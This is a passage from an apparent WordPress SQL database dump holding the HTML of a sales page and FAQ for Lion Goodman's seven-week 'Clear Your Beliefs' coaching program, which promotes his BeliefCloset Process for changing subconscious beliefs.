bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-21 14:47:20', '2015-05-21 19:47:20', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2156, 2, '2015-04-14 12:12:08', '2015-04-14 17:12:08', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it 